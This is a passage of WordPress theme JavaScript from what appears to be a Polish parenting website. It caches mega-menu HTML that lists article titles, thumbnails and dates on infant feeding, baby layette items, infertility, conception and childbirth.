                            tdLocalCache.set(currentBlockObjSignature, JSON.stringify({"td_data":"<div class=\"td-mega-row\"><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/zdrowe-kaszki-dla-niemowlat-takze-dla-alergikow\/\" rel=\"bookmark\" title=\"Zdrowe kaszki dla niemowl\u0105t tak\u017ce dla alergik\u00f3w\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/02\/9e7ae08563048ee9b9ae9085db55b3a6-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/02\/9e7ae08563048ee9b9ae9085db55b3a6-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/02\/9e7ae08563048ee9b9ae9085db55b3a6-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/02\/9e7ae08563048ee9b9ae9085db55b3a6-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Zdrowe kaszki dla niemowl\u0105t tak\u017ce dla alergik\u00f3w\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/ciaza-i-porod\/karmienie\/\" class=\"td-post-category\">Karmienie<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/zdrowe-kaszki-dla-niemowlat-takze-dla-alergikow\/\" rel=\"bookmark\" title=\"Zdrowe kaszki dla niemowl\u0105t tak\u017ce dla alergik\u00f3w\">Zdrowe kaszki dla niemowl\u0105t tak\u017ce dla alergik\u00f3w<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2019-02-04T16:05:44+00:00\" >4 lutego 2019<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/mleka-i-kaszki-ekologiczne-nie-z-supermarketow\/\" rel=\"bookmark\" title=\"Mleka i kaszki ekologiczne \u2013 nie z supermarket\u00f3w!\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/07\/biobaby_mleka-i-kaszki-ekologiczne-nie-z-supermarketow-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/07\/biobaby_mleka-i-kaszki-ekologiczne-nie-z-supermarketow-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/07\/biobaby_mleka-i-kaszki-ekologiczne-nie-z-supermarketow-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/07\/biobaby_mleka-i-kaszki-ekologiczne-nie-z-supermarketow-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Mleka i kaszki ekologiczne \u2013 nie z supermarket\u00f3w!\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/ciaza-i-porod\/karmienie\/\" class=\"td-post-category\">Karmienie<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/mleka-i-kaszki-ekologiczne-nie-z-supermarketow\/\" rel=\"bookmark\" title=\"Mleka i kaszki ekologiczne \u2013 nie z supermarket\u00f3w!\">Mleka i kaszki ekologiczne \u2013 nie z supermarket\u00f3w!<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2018-07-09T20:00:06+00:00\" >9 lipca 2018<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/zakonczyc-karmienie-piersia-rozpoczac-podawanie-mleka-modyfikowanego\/\" rel=\"bookmark\" title=\"Jak zako\u0144czy\u0107 karmienie piersi\u0105 i rozpocz\u0105\u0107 podawanie mleka modyfikowanego?\"><img width=\"260\" height=\"173\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/02\/13.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/02\/13.jpg 960w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/02\/13-300x200.jpg 300w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/02\/13-768x512.jpg 768w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/02\/13-127x85.jpg 127w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/02\/13-101x68.jpg 101w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Jak zako\u0144czy\u0107 karmienie piersi\u0105 i rozpocz\u0105\u0107 podawanie mleka modyfikowanego?\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/ciaza-i-porod\/karmienie\/\" class=\"td-post-category\">Karmienie<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/zakonczyc-karmienie-piersia-rozpoczac-podawanie-mleka-modyfikowanego\/\" rel=\"bookmark\" title=\"Jak zako\u0144czy\u0107 karmienie piersi\u0105 i rozpocz\u0105\u0107 podawanie mleka modyfikowanego?\">Jak zako\u0144czy\u0107 karmienie piersi\u0105 i rozpocz\u0105\u0107 podawanie mleka modyfikowanego?<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2018-02-06T14:45:02+00:00\" >6 lutego 2018<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><\/div>","td_block_id":"td_uid_25_5c5e20b78d5c3","td_hide_prev":true,"td_hide_next":false}));
                                                    tmpObj = JSON.parse(JSON.stringify(block_td_uid_25_5c5e20b78d5c3));
                            tmpObj.is_ajax_running = true;
                            tmpObj.td_current_page = 1;
                            tmpObj.td_filter_value = 68;
                            var currentBlockObjSignature = JSON.stringify(tmpObj);
                            tdLocalCache.set(currentBlockObjSignature, JSON.stringify({"td_data":"<div class=\"td-mega-row\"><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/czy-i-kiedy-uzywac-poduszki-klin-dla-niemowlaka-i-dzieciaka\/\" rel=\"bookmark\" title=\"Czy i kiedy u\u017cywa\u0107 poduszki klin dla niemowlaka i dzieciaka?\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/01\/brothers-457237_1280-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/01\/brothers-457237_1280-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/01\/brothers-457237_1280-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/01\/brothers-457237_1280-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Czy i kiedy u\u017cywa\u0107 poduszki klin dla niemowlaka i dzieciaka?\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/ciaza-i-porod\/niemowleta\/\" class=\"td-post-category\">Niemowl\u0119ta<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/czy-i-kiedy-uzywac-poduszki-klin-dla-niemowlaka-i-dzieciaka\/\" rel=\"bookmark\" title=\"Czy i kiedy u\u017cywa\u0107 poduszki klin dla niemowlaka i dzieciaka?\">Czy i kiedy u\u017cywa\u0107 poduszki klin dla niemowlaka i dzieciaka?<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2019-01-09T19:13:29+00:00\" >9 stycznia 2019<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/akcesoria-niezbedne-w-wyprawce-dla-niemowlaka\/\" rel=\"bookmark\" title=\"Akcesoria niezb\u0119dne w wyprawce dla niemowlaka\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/01\/dziecko-260x195.jpeg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/01\/dziecko-260x195.jpeg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/01\/dziecko-80x60.jpeg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/01\/dziecko-245x184.jpeg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Akcesoria niezb\u0119dne w wyprawce dla niemowlaka\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/ciaza-i-porod\/niemowleta\/\" class=\"td-post-category\">Niemowl\u0119ta<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/akcesoria-niezbedne-w-wyprawce-dla-niemowlaka\/\" rel=\"bookmark\" title=\"Akcesoria niezb\u0119dne w wyprawce dla niemowlaka\">Akcesoria niezb\u0119dne w wyprawce dla niemowlaka<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2019-01-03T11:59:38+00:00\" >3 stycznia 2019<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/body-niemowlece-przelomowe-ubranka-z-wyprawki-dla-niemowlat\/\" rel=\"bookmark\" title=\"Body niemowl\u0119ce &#8211; prze\u0142omowe ubranka z wyprawki dla niemowl\u0105t\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/12\/bodygwiazda-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/12\/bodygwiazda-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/12\/bodygwiazda-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/12\/bodygwiazda-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Body niemowl\u0119ce &#8211; prze\u0142omowe ubranka z wyprawki dla niemowl\u0105t\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/ciaza-i-porod\/niemowleta\/\" class=\"td-post-category\">Niemowl\u0119ta<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/body-niemowlece-przelomowe-ubranka-z-wyprawki-dla-niemowlat\/\" rel=\"bookmark\" title=\"Body niemowl\u0119ce &#8211; prze\u0142omowe ubranka z wyprawki dla niemowl\u0105t\">Body niemowl\u0119ce &#8211; prze\u0142omowe ubranka z wyprawki dla niemowl\u0105t<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2018-12-22T11:07:04+00:00\" >22 grudnia 2018<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><\/div>","td_block_id":"td_uid_25_5c5e20b78d5c3","td_hide_prev":true,"td_hide_next":false}));
                                                    tmpObj = JSON.parse(JSON.stringify(block_td_uid_25_5c5e20b78d5c3));
                            tmpObj.is_ajax_running = true;
                            tmpObj.td_current_page = 1;
                            tmpObj.td_filter_value = 35;
                            var currentBlockObjSignature = JSON.stringify(tmpObj);
                            tdLocalCache.set(currentBlockObjSignature, JSON.stringify({"td_data":"<div class=\"td-mega-row\"><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/kiedy-nie-tak-latwo-zostac-tata\/\" rel=\"bookmark\" title=\"Kiedy nie tak \u0142atwo zosta\u0107 tat\u0105\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/07\/Kiedy-nie-tak-\u0142atwo-zosta\u0107-tat\u0105-foto-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/07\/Kiedy-nie-tak-\u0142atwo-zosta\u0107-tat\u0105-foto-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/07\/Kiedy-nie-tak-\u0142atwo-zosta\u0107-tat\u0105-foto-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/07\/Kiedy-nie-tak-\u0142atwo-zosta\u0107-tat\u0105-foto-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Kiedy nie tak \u0142atwo zosta\u0107 tat\u0105\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/ciaza-i-porod\/nieplodnosc\/\" class=\"td-post-category\">Niep\u0142odno\u015b\u0107<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/kiedy-nie-tak-latwo-zostac-tata\/\" rel=\"bookmark\" title=\"Kiedy nie tak \u0142atwo zosta\u0107 tat\u0105\">Kiedy nie tak \u0142atwo zosta\u0107 tat\u0105<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2018-07-18T14:24:39+00:00\" >18 lipca 2018<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/nieplodnosc-meska-nie-boli-i-w-xxi-wieku-to-wciaz-temat-tabu\/\" rel=\"bookmark\" title=\"Niep\u0142odno\u015b\u0107 m\u0119ska nie boli i w XXI wieku to wci\u0105\u017c temat tabu&#8230;\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/06\/holding-hands-1149411_1280-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/06\/holding-hands-1149411_1280-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/06\/holding-hands-1149411_1280-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/06\/holding-hands-1149411_1280-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Niep\u0142odno\u015b\u0107 m\u0119ska nie boli i w XXI wieku to wci\u0105\u017c temat tabu&#8230;\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/ciaza-i-porod\/nieplodnosc\/\" class=\"td-post-category\">Niep\u0142odno\u015b\u0107<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/nieplodnosc-meska-nie-boli-i-w-xxi-wieku-to-wciaz-temat-tabu\/\" rel=\"bookmark\" title=\"Niep\u0142odno\u015b\u0107 m\u0119ska nie boli i w XXI wieku to wci\u0105\u017c temat tabu&#8230;\">Niep\u0142odno\u015b\u0107 m\u0119ska nie boli i w XXI wieku to wci\u0105\u017c temat...<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2018-06-28T11:21:23+00:00\" >28 czerwca 2018<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/6-mitow-dotyczacych-in-vitro\/\" rel=\"bookmark\" title=\"6 mit\u00f3w dotycz\u0105cych in vitro\"><img width=\"260\" height=\"182\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2017\/07\/ciaza.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2017\/07\/ciaza.jpg 1000w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2017\/07\/ciaza-300x210.jpg 300w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2017\/07\/ciaza-768x538.jpg 768w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"6 mit\u00f3w dotycz\u0105cych in vitro\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/ciaza-i-porod\/nieplodnosc\/\" class=\"td-post-category\">Niep\u0142odno\u015b\u0107<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/6-mitow-dotyczacych-in-vitro\/\" rel=\"bookmark\" title=\"6 mit\u00f3w dotycz\u0105cych in vitro\">6 mit\u00f3w dotycz\u0105cych in vitro<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2017-08-23T10:18:19+00:00\" >23 sierpnia 2017<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><\/div>","td_block_id":"td_uid_25_5c5e20b78d5c3","td_hide_prev":true,"td_hide_next":false}));
                                                    tmpObj = JSON.parse(JSON.stringify(block_td_uid_25_5c5e20b78d5c3));
                            tmpObj.is_ajax_running = true;
                            tmpObj.td_current_page = 1;
                            tmpObj.td_filter_value = 30;
                            var currentBlockObjSignature = JSON.stringify(tmpObj);
                            tdLocalCache.set(currentBlockObjSignature, JSON.stringify({"td_data":"<div class=\"td-mega-row\"><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/witamina-b8-dlaczego-wazna-staraniach-o-dziecko\/\" rel=\"bookmark\" title=\"Witamina B8 &#8211; dlaczego jest wa\u017cna w staraniach o dziecko?\"><img width=\"260\" height=\"174\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2017\/02\/starania-o-dziecko-ip.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2017\/02\/starania-o-dziecko-ip.jpg 1000w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2017\/02\/starania-o-dziecko-ip-300x200.jpg 300w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2017\/02\/starania-o-dziecko-ip-768x513.jpg 768w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2017\/02\/starania-o-dziecko-ip-127x85.jpg 127w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2017\/02\/starania-o-dziecko-ip-101x68.jpg 101w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Witamina B8 &#8211; dlaczego jest wa\u017cna w staraniach o dziecko?\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/ciaza-i-porod\/nim-zajdziesz-w-ciaze\/\" class=\"td-post-category\">Nim zajdziesz w ci\u0105\u017ce<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/witamina-b8-dlaczego-wazna-staraniach-o-dziecko\/\" rel=\"bookmark\" title=\"Witamina B8 &#8211; dlaczego jest wa\u017cna w staraniach o dziecko?\">Witamina B8 &#8211; dlaczego jest wa\u017cna w staraniach o dziecko?<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2017-02-15T14:40:27+00:00\" >15 lutego 2017<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/chcecie-powiekszyc-rodzine-obliczcie-dni-plodne\/\" rel=\"bookmark\" title=\"Chcecie powi\u0119kszy\u0107 rodzin\u0119? Obliczcie dni p\u0142odne\"><img width=\"260\" height=\"173\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2016\/10\/fotolia_115884875_subscription_monthly_m.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2016\/10\/fotolia_115884875_subscription_monthly_m.jpg 1000w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2016\/10\/fotolia_115884875_subscription_monthly_m-300x200.jpg 300w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2016\/10\/fotolia_115884875_subscription_monthly_m-768x511.jpg 768w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2016\/10\/fotolia_115884875_subscription_monthly_m-127x85.jpg 127w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2016\/10\/fotolia_115884875_subscription_monthly_m-101x68.jpg 101w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Chcecie powi\u0119kszy\u0107 rodzin\u0119? Obliczcie dni p\u0142odne\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/ciaza-i-porod\/nim-zajdziesz-w-ciaze\/\" class=\"td-post-category\">Nim zajdziesz w ci\u0105\u017ce<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/chcecie-powiekszyc-rodzine-obliczcie-dni-plodne\/\" rel=\"bookmark\" title=\"Chcecie powi\u0119kszy\u0107 rodzin\u0119? Obliczcie dni p\u0142odne\">Chcecie powi\u0119kszy\u0107 rodzin\u0119? Obliczcie dni p\u0142odne<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2016-10-07T15:36:36+00:00\" >7 pa\u017adziernika 2016<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/kalendarz-dni-plodnych-go-uzywac\/\" rel=\"bookmark\" title=\"Kalendarz dni p\u0142odnych \u2013 co to jest i jak go u\u017cywa\u0107?\"><img width=\"260\" height=\"174\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2016\/08\/dollarphotoclub_67735249.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2016\/08\/dollarphotoclub_67735249.jpg 1000w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2016\/08\/dollarphotoclub_67735249-300x200.jpg 300w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2016\/08\/dollarphotoclub_67735249-768x513.jpg 768w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2016\/08\/dollarphotoclub_67735249-127x85.jpg 127w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2016\/08\/dollarphotoclub_67735249-101x68.jpg 101w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Kalendarz dni p\u0142odnych \u2013 co to jest i jak go u\u017cywa\u0107?\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/ciaza-i-porod\/nim-zajdziesz-w-ciaze\/\" class=\"td-post-category\">Nim zajdziesz w ci\u0105\u017ce<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/kalendarz-dni-plodnych-go-uzywac\/\" rel=\"bookmark\" title=\"Kalendarz dni p\u0142odnych \u2013 co to jest i jak go u\u017cywa\u0107?\">Kalendarz dni p\u0142odnych \u2013 co to jest i jak go u\u017cywa\u0107?<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2016-08-05T11:59:05+00:00\" >5 sierpnia 2016<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><\/div>","td_block_id":"td_uid_25_5c5e20b78d5c3","td_hide_prev":true,"td_hide_next":false}));
                                                    tmpObj = JSON.parse(JSON.stringify(block_td_uid_25_5c5e20b78d5c3));
                            tmpObj.is_ajax_running = true;
                            tmpObj.td_current_page = 1;
                            tmpObj.td_filter_value = 32;
                            var currentBlockObjSignature = JSON.stringify(tmpObj);
                            tdLocalCache.set(currentBlockObjSignature, JSON.stringify({"td_data":"<div class=\"td-mega-row\"><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/ginekolog-radzi-co-zrobic-by-podczas-porodu-mniej-bolalo\/\" rel=\"bookmark\" title=\"Ginekolog radzi \u2013 co zrobi\u0107, by podczas porodu mniej bola\u0142o?\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/04\/Ginekolog-radzi-co-zrobi\u0107-by-podczas-porodu-bola\u0142o-mniej-foto-1-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/04\/Ginekolog-radzi-co-zrobi\u0107-by-podczas-porodu-bola\u0142o-mniej-foto-1-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/04\/Ginekolog-radzi-co-zrobi\u0107-by-podczas-porodu-bola\u0142o-mniej-foto-1-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/04\/Ginekolog-radzi-co-zrobi\u0107-by-podczas-porodu-bola\u0142o-mniej-foto-1-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Ginekolog radzi \u2013 co zrobi\u0107, by podczas porodu mniej bola\u0142o?\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/ciaza-i-porod\/porod\/\" class=\"td-post-category\">Por\u00f3d<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/ginekolog-radzi-co-zrobic-by-podczas-porodu-mniej-bolalo\/\" rel=\"bookmark\" title=\"Ginekolog radzi \u2013 co zrobi\u0107, by podczas porodu mniej bola\u0142o?\">Ginekolog radzi \u2013 co zrobi\u0107, by podczas porodu mniej bola\u0142o?<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2018-04-16T11:52:37+00:00\" >16 kwietnia 2018<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/zalety-porodu-prywatnym-szpitalu\/\" rel=\"bookmark\" title=\"Zalety porodu w prywatnym szpitalu\"><img width=\"260\" height=\"173\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2017\/07\/fotolia_122132605_subscription_monthly_m.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2017\/07\/fotolia_122132605_subscription_monthly_m.jpg 1000w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2017\/07\/fotolia_122132605_subscription_monthly_m-300x200.jpg 300w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2017\/07\/fotolia_122132605_subscription_monthly_m-768x512.jpg 768w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2017\/07\/fotolia_122132605_subscription_monthly_m-127x85.jpg 127w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2017\/07\/fotolia_122132605_subscription_monthly_m-101x68.jpg 101w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Zalety porodu w prywatnym szpitalu\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/ciaza-i-porod\/porod\/\" class=\"td-post-category\">Por\u00f3d<\/a><\/div>\r\n            